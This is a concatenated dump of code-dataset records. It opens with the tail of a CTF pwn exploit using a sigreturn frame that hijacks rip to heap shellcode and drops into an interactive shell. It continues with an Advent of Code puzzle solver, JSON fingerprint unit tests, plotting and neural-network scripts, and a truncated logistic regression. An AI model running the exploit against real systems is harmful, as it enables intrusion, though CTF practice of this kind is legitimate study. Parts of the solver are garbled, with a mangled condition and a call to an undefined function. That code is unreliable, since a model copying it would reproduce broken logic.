p16(0x2b), # ss\r\n ]\r\n update(flat(partial_frame))\r\n\r\n # sys_restart_syscall : put shellcode on the heap when using printf(\"... by @%s\", ... , username)\r\n syscall(219, 0)\r\n # sys_rt_sigreturn : hijack rip points to shellcode on the heap\r\n syscall(15, 0)\r\n\r\n p.interactive()\r\n\r\nif __name__ == '__main__':\r\n exploit(args['REMOTE'])","sub_path":"2019/2019-rctf/syscall_interface/off_exp.py","file_name":"off_exp.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"651164402","text":"#!/usr/bin/python3\n\nimport networkx as nx\n#from copy import deepcopy\nimport sys\n#import random\nimport multiprocessing as mp\n\nprint (mp.cpu_count(),\"processors\")\n#themin = sys.maxsize\ntries=0\n#cache = dict()\n\n#import matplotlib.pyplot as plt\n\n#23100 too high\n#18386 too high\n\ndebug=False\n\nplanA = [\n \"#############\",\n \"#...........#\",\n \"###C#C#A#B###\",\n \"###D#D#B#A###\",\n \"#############\"]\n\n\nplan12521 = [\n \"#############\",\n \"#...........#\",\n \"###B#C#B#D###\",\n \"###A#D#C#A###\",\n \"#############\"]\n\nplan44169 = [\n \"#############\",\n \"#...........#\",\n \"###B#C#B#D###\",\n \"###D#C#B#A###\",\n \"###D#B#A#C###\", \n \"###A#D#C#A###\",\n \"#############\"]\n\nplant = [\n \"#############\",\n \"#CC.......DD#\",\n \"###.#.#A#B###\",\n \"###.#.#B#A###\",\n \"#############\"]\n\n\n\n\nplanB = [\n \"#############\",\n \"#...........#\",\n \"###C#C#A#B###\",\n \"###D#C#B#A###\",\n \"###D#B#A#C###\",\n \"###D#D#B#A###\",\n \"#############\"]\n\nplantBt = [\n \"#############\",\n \"#AA.....B.BD#\",\n \"###B#.#.#.###\",\n \"###D#C#.#.###\",\n \"###D#B#C#C###\",\n \"###A#D#C#A###\",\n \"#############\"]\n\n\n\nplan = planB\n\n\n\ndef path_weight(G,path, weight):\n \n multigraph = G.is_multigraph()\n cost = 0\n\n for node, nbr in nx.utils.pairwise(path):\n if multigraph:\n cost += min([v[weight] for v in 
G[node][nbr].values()])\n        else:\n            cost += G[node][nbr][weight]\n    return cost\n\n\nclass Bagg:\n\n    e = {\"A\":1, \"B\":10, \"C\":100, \"D\":1000}\n    home = {\"A\":3, \"B\":5, \"C\":7, \"D\":9}\n\n    def __lt__(self, other):\n\n        if self.t < other.t:\n            return True\n        return False\n\n    # (reconstruction: the tail of __lt__, all of __init__ and the findmoves\n    # header were lost from this dump; minimal versions are inferred from the\n    # call sites Bagg(plan[y][x],x,y) and bagg[bi].findmoves(bagg, G, plan) below)\n    def __init__(self, t, x, y):\n        self.t = t\n        self.x = x\n        self.y = y\n\n    def findmoves(self, otherbagg, G, plan):\n\n        if self.y>=2: # check all levels\n            if (debug):\n                print(\"we are deeper than the corridor, check if we are good\")\n            \n            X = sorted(list(filter(lambda x:x is not self and x.t==self.t and x.x==self.home[self.t], otherbagg)), key=lambda b:b.y)\n            l = len(plan)-4\n            if (debug):\n                print(\"bagg in home for\",self,\"of type\",self.t,\" are :\",X)\n            \n            # if all items in the list are home, and stacked starting from the bottom of the possible burrow, we are good\n            if X!=[]:\n                bcnt=0\n                #print (range(l,0,-1))\n                GOGG=[str(x.x)+\",\"+str(x.y) for x in X]\n                for ll in range(len(plan)-2,0,-1):\n                    if debug:\n                        print (\"checking position\",str(self.home[self.t])+\",\"+str(ll),\"in\",GOGG)\n                    \n                    if str(self.home[self.t])+\",\"+str(ll) in GOGG:\n                        if debug:\n                            print (\"Found a lower bagg - good\")\n                        bcnt+=1\n                    else:\n                        break\n                \n                if bcnt==len(X) and len(X)!=0:\n                    #print (\"bagg\",self,\"is at home due to\",GOGG)\n                    return None\n            \n        \n        \n        if debug:\n            print(\"done checking if we are at home or not (we were not at home)\")\n        \n        # list of _potential_ moves\n        P = set(G.nodes())\n\n        X = list(filter(lambda x:x is not self, otherbagg))\n        \n        for i in X:\n            P.remove(str(i.x)+\",\"+str(i.y))\n\n        if debug:\n            print(P)\n\n        # this is the list of all unoccupied spaces in the graph\n        # filter it for what we actually are able to do\n\n\n        # something here seems to be borked\n        # don't move to a burrow if the burrow contains a bagg of another kind\n        # that bagg has to move outside first\n        # we are not allowed to move to a burrow if there is a bagg of another type in it\n        # fix this for part 2\n        for i in [3,5,7,9]:\n            if i == self.home[self.t]:\n                NOT = list(filter(lambda vx: vx.x==i and vx.y>2 and vx.t != self.t, otherbagg))\n\n                if debug:\n                    print(self,\"check if have to move out >\",NOT,\"< from\",P,len(NOT))\n                \n                for vt in NOT:\n\n                    P.discard(str(vt.x)+\",2\")\n                    P.discard(str(vt.x)+\",3\")\n                    P.discard(str(vt.x)+\",4\")\n                    P.discard(str(vt.x)+\",5\")\n                    \n                    if debug:\n                        print(\"occ\",vt,P)\n\n        if debug:\n            print(\"P after home bopp removed\",P)\n\n        \n        # move to the lowest block in a burrow if we are allowed to move to a burrow\n        \n        for i in [3,5,7,9]:\n            if str(i)+\",3\" in P:\n                P.discard(str(i)+\",2\")\n            if len(plan)>5:\n                if str(i)+\",4\" in P:\n                    P.discard(str(i)+\",2\")\n                    P.discard(str(i)+\",3\")\n                if str(i)+\",5\" in P:\n                    P.discard(str(i)+\",2\")\n                    P.discard(str(i)+\",3\")\n                    P.discard(str(i)+\",4\")\n\n        # don't move to a burrow if we are not supposed to be in that burrow\n        for i in self.home:\n            if i!=self.t:\n                P.discard(str(self.home[i])+\",2\")\n                P.discard(str(self.home[i])+\",3\")\n                P.discard(str(self.home[i])+\",4\")\n                P.discard(str(self.home[i])+\",5\")\n        \n\n        if debug:\n            print(\"P after burrow check:\",P)\n        \n        if debug:\n            print(\"wrong homes !=\",self.home[self.t],\"removed\",P)\n        \n\n        if debug:\n            print(\"removed occupied burrows\",P)\n        \n\n        # do not move in the corridor, if we already are in the corridor\n        if self.y==1:\n            for i in range(12):\n                P.discard(str(i)+\",1\")\n\n        if debug:\n            print(\"P after corridor check\",P)\n        \n        # find all possible paths from where we are to unoccupied spaces\n        V=[]\n        for i in P:\n            t = nx.shortest_path(G,str(self.x)+\",\"+str(self.y),i,weight=\"weight\")\n            V.append((path_weight(G,t,\"weight\")*self.e[self.t], 
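            # each candidate is stored as (path weight * this bagg's per-step energy, the path itself)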
nx.shortest_path(G,str(self.x)+\",\"+str(self.y),i,weight=\"weight\")))\n\n\n if debug:\n print(\"All possible paths from\",self,\"to\",P)\n print(V)\n # then remove paths that collide with occupied spaces\n\n for i in list(X): # these are the occupied spaces\n for t in range(len(V)-1,-1,-1):\n if str(i.x)+\",\"+str(i.y) in V[t][1] or len(V[t][1])==1:\n V.pop(t)\n\n #print (V)\n # if our home is at the end of a possible path, go for it and nothing else\n homeV=[]\n for x in V:\n if str(self.home[self.t])+\",2\" in x[1] or str(self.home[self.t])+\",3\" in x[1]:\n if debug:\n print(\"going home\", [x])\n homeV.append(x)\n\n if homeV!=[]:\n V=homeV\n\n if len(V)>0:\n if debug: \n print(\"final possible remaining moves\", V)\n # random.shuffle(V)\n V=sorted(V,reverse=True,key=lambda x:x[0])\n return (V)\n else:\n return None\n\n def __repr__(self):\n return \"[\"+self.t+\":\"+str(self.x)+\",\"+str(self.y)+\"]\"\n \nbagg = []\n \nG = nx.Graph()\n\n# corridor\nG.add_edge(\"1,1\",\"2,1\",weight=1)\nG.add_edge(\"2,1\",\"4,1\",weight=2)\nG.add_edge(\"4,1\",\"6,1\",weight=2)\nG.add_edge(\"6,1\",\"8,1\",weight=2)\nG.add_edge(\"8,1\",\"10,1\",weight=2)\nG.add_edge(\"10,1\",\"11,1\",weight=1)\n\n# burrows\n\nG.add_edge(\"2,1\",\"3,2\",weight=2)\nG.add_edge(\"4,1\",\"3,2\",weight=2)\nG.add_edge(\"3,2\",\"3,3\",weight=1)\n\nG.add_edge(\"4,1\",\"5,2\",weight=2)\nG.add_edge(\"6,1\",\"5,2\",weight=2)\nG.add_edge(\"5,2\",\"5,3\",weight=1)\n\nG.add_edge(\"6,1\",\"7,2\",weight=2)\nG.add_edge(\"8,1\",\"7,2\",weight=2)\nG.add_edge(\"7,2\",\"7,3\",weight=1)\n\nG.add_edge(\"8,1\",\"9,2\",weight=2)\nG.add_edge(\"10,1\",\"9,2\",weight=2)\nG.add_edge(\"9,2\",\"9,3\",weight=1)\n\nif(len(plan)==7):\n G.add_edge(\"3,3\",\"3,4\",weight=1)\n G.add_edge(\"3,4\",\"3,5\",weight=1)\n\n G.add_edge(\"5,3\",\"5,4\",weight=1)\n G.add_edge(\"5,4\",\"5,5\",weight=1)\n\n G.add_edge(\"7,3\",\"7,4\",weight=1)\n G.add_edge(\"7,4\",\"7,5\",weight=1)\n\n G.add_edge(\"9,3\",\"9,4\",weight=1)\n G.add_edge(\"9,4\",\"9,5\",weight=1)\n\n\n#nx.draw(G, with_labels=True)\n#plt.savefig(\"maze.png\")\n\nfor y in range(len(plan)):\n s=\"\"\n for x in range(len(plan[0])):\n \n if plan[y][x] in \"ABCD\":\n bagg.append(Bagg(plan[y][x],x,y))\n s+=\".\"\n else:\n s+=plan[y][x]\n plan[y]=s\n \ndef pr(rec, board, bagg, cost):\n\n bs = []\n for y in range(len(board)):\n s=\"\"\n for x in range(len(board[0])):\n for b in bagg:\n if b.x==x and b.y==y:\n s+=b.t\n break\n if len(s)<=x:\n s+=board[y][x]\n\n bs.append(s)\n return bs\n\ndef moveprint(p):\n\n #print (p)\n if p==[]:\n return\n\n for i in range(max(0,len(p)-17),len(p)):\n print (str(i).ljust(len(p[0][0])+1,\" \"),end=\"\")\n print(\"\")\n for i in range(len(p[0])):\n for j in range(max(0,len(p)-17),len(p)):\n print(p[j][i]+\" \",end=\"\")\n print(\"\")\n\n\ndef descend(bagg, G, board, bx, mv, bi, rec=0, cost=0,path=[],themin=sys.maxsize,queue=None):\n\n global debug\n \n #print (\"moving bagg\",i)\n #moveprint(path)\n\n zcount=0\n for thez in bx[bi]:\n zcount+=1\n if (cost+thez[0])themin:\n print(rec,\"cost\",cost,\"themin\",themin)\n return sys.maxsize\n\n\n #pr(rec, board,bagg, cost)\n\n #proppen = \"\".join(pr(rec, board, bagg, cost))\n #if proppen in cache:\n # return cache[proppen]\n \n\n c=0\n for baggi in bagg:\n if baggi.x==baggi.home[baggi.t] and baggi.y>1:\n c+=1\n \n #print(\"home: \",c)\n if c==len(bagg):\n if themin is None or cost < themin:\n print (\"all home\",cost)\n #pr(rec, board, bagg, cost)\n moveprint(path)\n themin = cost\n if queue is not None:\n #print(\"sending result to 
queue\")\n queue.put(themin)\n return cost\n\n if rec==0:\n m = mp.Manager()\n queue=m.Queue()\n \n if rec==0:\n pool = mp.Pool(max(len(bagg),mp.cpu_count()))\n print(\"Created pool with\",max(len(bagg),mp.cpu_count()),\"threads\")\n \n mv=themin \n koko=0\n bokbok=[]\n thebagg = dict()\n\n for bi in range(len(bagg)):\n thebagg[bi] = bagg[bi].findmoves(bagg, G, plan)\n bokbok.append(thebagg[bi])\n if thebagg[bi]:\n koko+=len(thebagg[bi])\n if rec==0:\n res = pool.apply_async(descend, (bagg, G, board,thebagg,mv,bi),{\"rec\":rec, \"cost\":cost,\"path\":path,\"themin\":themin,\"queue\":queue})\n results.append(res)\n else:\n #if rec>0 and queue is None:\n # print(rec,\":\",bagg[bi],\"moves\",thebagg[bi])\n mv = descend(bagg, G, board,thebagg,mv,bi,rec, cost,path,themin,queue)\n \n if koko==0:\n #print(\"deadlock\",cost)\n #if cost==660:\n # #debug=True\n # moveprint(path)\n # #print(bokbok)\n if queue is not None:\n #print(\"sending result to queue\")\n queue.put(sys.maxsize)\n return sys.maxsize\n\n if rec==0:\n mscnt=0\n while True:\n try:\n v = [res.get(timeout=1) for res in results]\n print (v)\n return (min(v))\n except:\n try:\n while True:\n w = queue.get(False)\n if w != sys.maxsize:\n print (\"got potential minvalue\",w,\"old minvalue is\",mv)\n else:\n mscnt+=1\n if mscnt%1000==0:\n print(mscnt,\"dead ends, minvalue=\",mv)\n if w < mv:\n print (\"new minvalue\",w)\n mv = w\n break\n except: # queue empty exception\n pass\n\n #cache[proppen]=mv \n return mv \n \nthemin=movebagg(bagg,G,plan,rec=0)\n \nprint(\"Answer 1:\",themin) \n\n","sub_path":"2021/23/23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":14294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"171570189","text":"import json\nimport os\nimport unittest\n\nfrom json_fingerprint import create\nfrom json_fingerprint._exceptions import FingerprintJSONLoadError\n\nTESTS_DIR = os.path.dirname(__file__)\nTESTDATA_DIR = os.path.join(TESTS_DIR, 'testdata')\n\n\nclass TestCreate(unittest.TestCase):\n def test_jfpv1_json_load_error(self):\n \"\"\"Test json fingerprint raw json string load error.\n\n Verify that:\n - FingerprintJSONLoadError is properly raised with malformed json input string\"\"\"\n with self.assertRaises(FingerprintJSONLoadError):\n create('{\"foo\": bar}', hash_function='sha256', version=1)\n\n def test_jfpv1_sha256_output_format(self):\n \"\"\"Test jfpv1 output format.\n\n Verify that:\n - Complete jfpv1-sha256 output fingerprint is properly formatted\"\"\"\n fp = create(input='{\"foo\": \"bar\"}', hash_function='sha256', version=1)\n self.assertRegex(fp, '^jfpv1\\\\$sha256\\\\$[0-9a-f]{64}$')\n\n def test_jfpv1_sha384_output_format(self):\n \"\"\"Test jfpv1 output format.\n\n Verify that:\n - Complete jfpv1-sha256 output fingerprint is properly formatted\"\"\"\n fp = create(input='{\"foo\": \"bar\"}', hash_function='sha384', version=1)\n self.assertRegex(fp, '^jfpv1\\\\$sha384\\\\$[0-9a-f]{96}$')\n\n def test_jfpv1_sha512_output_format(self):\n \"\"\"Test jfpv1 output format.\n\n Verify that:\n - Complete jfpv1-sha256 output fingerprint is properly formatted\"\"\"\n fp = create(input='{\"foo\": \"bar\"}', hash_function='sha512', version=1)\n self.assertRegex(fp, '^jfpv1\\\\$sha512\\\\$[0-9a-f]{128}$')\n\n def test_jfpv1_sha256_mixed_order(self):\n \"\"\"Test jfpv1 sha256 mixed order fingerprint match.\n\n Verify that:\n - The fingerprints of test objects 1 and 2 match despite same data being ordered differently\n - The fingerprints also match 
against a known valid fingerprint\"\"\"\n with open(os.path.join(TESTDATA_DIR, 'jfpv1_test_obj_1.json'), 'r') as file:\n self.test_obj_1 = file.read()\n file.close()\n\n with open(os.path.join(TESTDATA_DIR, 'jfpv1_test_obj_2.json'), 'r') as file:\n self.test_obj_2 = file.read()\n file.close()\n fp_1 = create(self.test_obj_1, hash_function='sha256', version=1)\n fp_2 = create(self.test_obj_2, hash_function='sha256', version=1)\n self.assertEqual(fp_1, fp_2)\n self.assertEqual(fp_1, 'jfpv1$sha256$b182c755347a6884fd11f1194cbe0961f548e5ac62be78a56c48c3c05eb56650')\n\n def test_jfpv1_sha256_structural_distinction_1(self):\n \"\"\"Test jfpv1 json flattener's structural value distinction.\n\n Verify that:\n - Identical value content in identical depths, but in different structures,\n don't produce identical outputs\"\"\"\n obj_in_1 = [\n 1,\n [1, [2, 2]],\n [2, [2, 2]],\n ]\n fp_1 = create(input=json.dumps(obj_in_1), hash_function='sha256', version=1)\n\n obj_in_2 = [\n 1,\n [1, 2, [2, 2, 2, 2]],\n ]\n fp_2 = create(input=json.dumps(obj_in_2), hash_function='sha256', version=1)\n\n self.assertNotEqual(fp_1, fp_2)\n\n def test_jfpv1_sha256_structural_distinction_2(self):\n \"\"\"Test jfpv1 json flattener's structural value distinction.\n\n Verify that:\n - Values in identical paths/structures but different sibling values don't get matched\"\"\"\n obj_in_1 = [\n [1, ['x', 'x']],\n [2, ['y', 'y']],\n ]\n fp_1 = create(input=json.dumps(obj_in_1), hash_function='sha256', version=1)\n\n obj_in_2 = [\n [1, ['x', 'y']],\n [2, ['x', 'y']],\n ]\n fp_2 = create(input=json.dumps(obj_in_2), hash_function='sha256', version=1)\n\n self.assertNotEqual(fp_1, fp_2)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"json_fingerprint/tests/test_create.py","file_name":"test_create.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"123592977","text":"import torch\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom scipy.interpolate import griddata\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import colors\n\nNH = 100\nLR = 0.001\nEP = 2000\nSEED = 1\nDIM = 201\n\nNICE_NAMES_DICT = {\n \"xy_no_symm\": \"Symmetry-free XY Model\",\n \"xy_hard_symm\": \"Symmetry-enforced XY Model\",\n \"tfim_no_symm\": \"TFIM\",\n}\n\nNUM_PARS = 6\n\nSEED = 1\ntorch.manual_seed(SEED)\n\nparams = {\n \"text.usetex\": True,\n \"font.family\": \"serif\",\n \"legend.fontsize\": 10,\n \"axes.labelsize\": 10,\n \"xtick.labelsize\": 10,\n \"ytick.labelsize\": 10,\n \"lines.linewidth\": 1,\n \"patch.edgecolor\": \"black\",\n}\n\ndef loss_plot_heatmap(physics_model, symm_type, N, max_change):\n\n model_name = \"{0}_{1}\".format(physics_model, symm_type)\n results_folder = \"results/{0}_results\".format(model_name)\n study_name = \"N{0}_nh{1}_lr{2}_ep{3}\".format(N, NH, LR, EP)\n\n # Define the intervals which alpha, beta will take\n alpha_min, alpha_max = -max_change, max_change\n beta_min, beta_max = -max_change, max_change\n\n alpha_vals = np.linspace(alpha_min, alpha_max, DIM)\n beta_vals = np.linspace(beta_min, beta_max, DIM)\n grid_alphas, grid_betas = np.meshgrid(alpha_vals, beta_vals)\n\n landscape_file = \"loss_landscape_range{0}_dim{1}_{2}_{3}_seed{4}.txt\".format(\n max_change, DIM, model_name, study_name, SEED\n )\n loss_data = np.loadtxt(\n \"{0}/{1}/{2}\".format(results_folder, study_name, landscape_file)\n )\n\n # Now make plots of parameters 
trajectory\n # First retrieve final values of params\n max_ep = 2000 # how long training occurs for\n opt_params = []\n for par_num in range(NUM_PARS):\n param_filename = \"param{0}_{1}_epoch2000_N{2}_nh{3}_lr{4}_ep{5}.txt\".format(\n par_num, model_name, N, NH, LR, EP\n )\n param = np.loadtxt(\n \"{0}/{1}/param_vals/{2}\".format(results_folder, study_name, param_filename)\n )\n opt_params.append(param)\n\n # Get recorded values from data files\n period = 5 # how often parameter info recorded\n epochs = range(0, max_ep + 1, period)\n\n epochs_dict = {} # store epoch: listof params\n for epoch in epochs:\n params = []\n for par_num in range(NUM_PARS):\n param_filename = \"param{0}_{1}_epoch{2}_N{3}_nh{4}_lr{5}_ep{6}.txt\".format(\n par_num, model_name, epoch, N, NH, LR, EP\n )\n param = np.loadtxt(\n \"{0}/{1}/param_vals/{2}\".format(\n results_folder, study_name, param_filename\n )\n )\n param -= opt_params[par_num] # centre at optimum\n params.append(param)\n epochs_dict[epoch] = params\n\n # Get deltas and etas using same seed\n deltas = []\n etas = []\n for par_num in range(NUM_PARS):\n delta = np.loadtxt(\n \"{0}/{1}/delta{2}_{3}_N{4}_nh{5}_lr{6}_ep{7}.txt\".format(\n results_folder, study_name, par_num, model_name, N, NH, LR, EP\n )\n )\n eta = np.loadtxt(\n \"{0}/{1}/eta{2}_{3}_N{4}_nh{5}_lr{6}_ep{7}.txt\".format(\n results_folder, study_name, par_num, model_name, N, NH, LR, EP\n )\n )\n deltas.append(delta)\n etas.append(eta)\n\n # Now compute alphas and betas for every epoch\n alphas = []\n betas = []\n for epoch in epochs:\n alpha = 0\n beta = 0\n for par_num in range(NUM_PARS):\n # Need to expand dims to use tensor dot\n curr_params = epochs_dict[epoch][par_num]\n delta = deltas[par_num]\n eta = etas[par_num]\n if len(curr_params.shape) == 1:\n curr_params = np.expand_dims(curr_params, axis=0)\n delta = np.expand_dims(delta, axis=0)\n eta = np.expand_dims(eta, axis=0)\n alpha += np.tensordot(curr_params, delta)\n beta += np.tensordot(curr_params, eta)\n alphas.append(alpha)\n betas.append(beta)\n\n # NOTE: This stuff is for interpolating, which isn't good in this case\n # n_points = 10000\n # alpha_indices = np.random.choice(DIM, n_points)\n # beta_indices = np.random.choice(DIM, n_points)\n\n # alpha_points = alpha_vals[alpha_indices]\n # beta_points = beta_vals[beta_indices]\n # loss_points = loss_data[alpha_indices, beta_indices]\n # points_tuple = (alpha_points, beta_points)\n # grid_tuple = (grid_alphas, grid_betas)\n\n # interp_vals = griddata(\n # points_tuple, loss_points, grid_tuple, method=\"cubic\"\n # )\n\n fig, ax = plt.subplots()\n # ax.contourf(grid_alphas, grid_betas, interp_vals)\n norm = colors.Normalize(vmin=loss_data.min(), vmax=loss_data.max())\n contour = ax.imshow(\n loss_data,\n cmap=\"YlGn\",\n norm=norm,\n extent=[-max_change, max_change, -max_change, max_change],\n )\n ax.set_xlim(-max_change, max_change)\n ax.set_ylim(-max_change, max_change)\n fig.colorbar(contour, ax=ax)\n ax.plot(alphas, betas, color=\"C0\", linestyle=\"-\")\n ax.scatter(alphas[::40], betas[::40], color=\"C3\")\n ax.set_title(r\"{0} loss landscape projection\".format(NICE_NAMES_DICT[model_name]))\n ax.set_xlabel(r\"$\\alpha$\")\n ax.set_ylabel(r\"$\\beta$\")\n # ax.set_zlabel(r\"Loss\")\n\n image_name = (\n \"plot_loss_landscape_heatmap_range{0}_dim{1}_{2}_{3}_seed{4}.pdf\".format(\n max_change, DIM, model_name, study_name, SEED\n )\n )\n plt.savefig(\"{0}/{1}/{2}\".format(results_folder, study_name, 
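        # written to results/<model>_results/<study_name>/ alongside the study's other outputs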
image_name))\n","sub_path":"landscape_visualization/landscape_visualization_plot_heatmap.py","file_name":"landscape_visualization_plot_heatmap.py","file_ext":"py","file_size_in_byte":5584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"187058827","text":"import data\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom dat import sigmoid,der_sigmoid,train_data,test_data\nfrom scipy.optimize import minimize\nfrom IPython.display import clear_output\nclass Network:\n\t\n\tdef __init__(self,l,size=0):\n\t\tself.m=l.shape[0]\n\t\tself.input=l.shape[1]\n\t\t#theta initialisations\n\t\tself.theta1=np.random.randn(self.input,15)\n\t\tself.theta2=np.random.randn(16,15)\n\t\tself.theta3=np.random.randn(16,10)\n\t\t#activation \n\t\tself.activate1=l\n\t\tself.activate4=np.random.randn(self.m,10)\n\t\tself.activate2=np.random.randn(self.m,16)\n\t\tself.activate3=np.random.randn(self.m,16)\n\t\t#partial derivative wrt to theta\n\t\tself.del4=np.random.randn(self.m,10)\n\t\tself.del2=np.random.randn(self.m,16)\n\t\tself.del3=np.random.randn(self.m,16)\n\t\t\n\tdef pr(self):\n\t\treturn self.activate2.shape,self.activate3.shape,self.activate4.shape\n\t\n\tdef feedforward(self,l):\n\t\ta=l\n\t\ta=a.dot(self.theta1)\n\t\tb=np.ones((a.shape[0],16))\n\t\tb[:,1:]=sigmoid(a)\n\t\ta=b\n\t\tself.activate2=a\n\t\ta=a.dot(self.theta2)\n\t\tb=np.ones((a.shape[0],16))\n\t\tb[:,1:]=sigmoid(a)\n\t\ta=b\n\t\tself.activate3=a\n\t\ta=a.dot(self.theta3)\n\t\ta=sigmoid(a)\n\t\tself.activate4=a\n\t\treturn a\n\t\n\tdef backprop(self,y):\n\t\tself.del4=self.activate4-y\n\t\tself.del3=(self.del4.dot((self.theta3).T))*(self.activate3*(1-self.activate3))\n\t\tself.del2=(self.del3[:,1:].dot(self.theta2.T))*(self.activate2*(1-self.activate2))\n\t\treturn self.del4,self.del3,self.del2\n\t\n\tdef cost(self,lam,y):\n\t\tJ=-y*(np.log(sigmoid(self.activate4)))-(1-y)*(np.log(1-sigmoid(self.activate4)))\n\t\tJ=np.sum(J)\n\t\tJ+=(lam/2)*(np.sum(self.theta1*self.theta1)+np.sum(self.theta3[:,1:]*self.theta3[:,1:])+np.sum(self.theta2[:,1:]*self.theta2[:,1:]))\n\t\tJ/=self.m\n\t\treturn J\n\t\t\n\tdef der(self,lam):\n\t\tder4=0\n\t\tder4+= self.activate3.T.dot(self.del4)\n\t\tder3=self.activate2.T.dot(self.del3[:,1:])\n\t\tder2=self.activate1.T.dot(self.del2[:,1:])\n\t\t\n\t\tder4/=self.m\n\t\tder3/=self.m\n\t\tder2/=self.m\n\t\t\n\t\tder4[:,1:]+=lam*(self.theta3[:,1:])\n\t\tgrad4=np.reshape(der4,(der4.shape[0]*der4.shape[1],1))\n\t\t\n\t\tder3[:,1:]+=lam*(self.theta2[:,1:])\n\t\tgrad3=np.reshape(der3,(der3.shape[0]*der3.shape[1],1))\n\t\t\n\t\tder2[:,1:]+=lam*(self.theta1[:,1:])\n\t\tgrad2=np.reshape(der2,(der2.shape[0]*der2.shape[1],1))\n\t\t\n\t\tgrad=np.concatenate((grad2,grad3,grad4))\n\t\tgrad=np.reshape(grad,(grad.shape[0]*grad.shape[1],1))\n\t\treturn der2,der3,der4\n\t\n\tdef grad_descent(self,alpha,it):\n\t\tx,y= train_data()\n\t\ta=self.feedforward(x)\n\t\tb=self.backprop(y)\n\t\tg1,g2,g3=self.der(0.1)\n\t\tfor j in range(it):\n\t\t\tprint(\"iteration: \"+str(j)+\"|training:\")\n\t\t\tplt.imshow(self.theta2,cmap=plt.get_cmap('gray'))\n\t\t\tplt.show()\n\t\t\tt1=self.theta1-(alpha*g1)\n\t\t\tt2=self.theta2-(alpha*g2)\n\t\t\tt3=self.theta3-(alpha*g3)\n\t\t\tself.theta1=t1\n\t\t\tself.theta2=t2\n\t\t\tself.theta3=t3\n\t\t\ta=self.feedforward(x)\n\t\t\tb=self.backprop(y)\n\t\t\tg1,g2,g3=self.der(0.1)\n\tdef grad(self,epsilon,lam,y):\n\t\t\n\t\tfor i in range(self.theta1.shape[0]):\n\t\t\tfor j in 
range(self.theta1.shape[1]):\n\t\t\t\t# central-difference gradient check (the original loop body broke off\n\t\t\t\t# after c_minus; completed minimally here). copy() matters: a plain\n\t\t\t\t# assignment would only alias theta1 and the restore would be a no-op.\n\t\t\t\tt1=self.theta1.copy()\n\t\t\t\tself.theta1[i][j]+=epsilon\n\t\t\t\tself.feedforward(self.activate1) # refresh activations for the perturbed weights\n\t\t\t\tc_plus=self.cost(lam,y)\n\t\t\t\tself.theta1=t1.copy()\n\t\t\t\tself.theta1[i][j]-=epsilon\n\t\t\t\tself.feedforward(self.activate1)\n\t\t\t\tc_minus=self.cost(lam,y)\n\t\t\t\tself.theta1=t1 # restore, then report the numerical derivative estimate\n\t\t\t\tprint((c_plus-c_minus)/(2*epsilon))\n\n\tdef output(self):\n\t\tx=test_data()\n\t\ty=self.feedforward(x)\n\t\ty_label=np.argmax(y,axis=1)\n\t\treturn y_label","sub_path":"net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"157641128","text":"#Author:liulu\n#Date:2020.09.06\n#Reference code: https://github.com/Dod-o/Statistical-Learning-Method_Code\n#                https://github.com/fengdu78/lihang-code\n'''\nDataset: iris\nAbout the dataset: iris is 150*5 - the first four columns are features, the last column is the label;\nthere are three label classes, each with 50 samples.\nTo keep the plots simple, this program only uses the first two features (sepal length and sepal width)\nand only the first 100 samples, i.e. two label classes, so it performs binary classification.\n\nThe weights are updated with gradient descent.\n'''\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split\n\n# Load the data\ndef loadData():\n    print(\"start to load data\")\n    iris = load_iris()\n    df = pd.DataFrame(iris.data, columns=iris.feature_names)\n    df['label'] = iris.target\n    # the original column labels carry the unit cm, so redefine them here\n    df.columns = ['sepal length', 'sepal width', 'petal length', 'petal width', 'label']\n    # convert the pd.DataFrame to a numpy array and slice out the first two feature columns plus the label column\n    data = np.array(df.iloc[:100, [0, 1, -1]])\n    print(\"loading completed\")\n    return data[:,:-1],data[:,-1]\n\n\nclass LogisticRegression:\n    # initialize the weights, learning rate and maximum number of iterations\n    def __init__(self,learning_rate = 0.01, max_iter = 200):\n        self.w = np.zeros((3,1),dtype=np.float) # to use all features of the iris dataset, change this 3 to 5\n        self.learning_rate = learning_rate\n        self.max_iter = max_iter\n\n    # the sigmoid function\n    def sigmoid(self,x):\n        return 1 / (1 + np.exp(-x))\n\n    # training via gradient descent\n    def train(self, train_data, train_label):\n        print(\"start to train\")\n        # train_label comes in as a 1-d array that cannot be transposed, so expand it to 2-d\n        train_label = np.array([train_label]).T\n        for iter in range(self.max_iter):\n            # gradient descent implemented row by row with a for loop\n            for i in range(len(train_data)):\n                x = np.array([train_data[i]])\n                y = train_label[i]\n                wx = np.dot(x, self.w)\n                self.w += self.learning_rate*(x*y - (np.exp(wx) * x) / ( 1 + np.exp(wx))).T\n\n            # the same update written directly with matrices\n            # compute w*x\n            # wx = np.dot(train_data, self.w)\n            # # compute the gradient\n            # gradient = np.dot(train_data.T, (self.sigmoid(wx) - train_label))\n            # # update the weights\n            # self.w -= self.learning_rate*gradient\n        print(\"training completed\")\n        print(\"w is {}\".format(self.w))\n\n    # prediction\n    def predict(self, x):\n        wx = np.dot(x, self.w)\n        result = self.sigmoid(wx)\n        if result > 0.5:\n            return 1\n        else:\n            return 0\n\n    # test and report the accuracy\n    def test(self, test_data, test_label):\n        print(\"start to test\")\n        error_count = 0\n        for i in range(len(test_data)):\n            x = test_data[i]\n            y = test_label[i]\n            if y != self.predict(x):\n                error_count += 1\n        acc = 1 - error_count/len(test_data)\n        print(\"testing completed\")\n        print(\"Accuracy is {:.3%}\".format(acc))\n\nif __name__ == 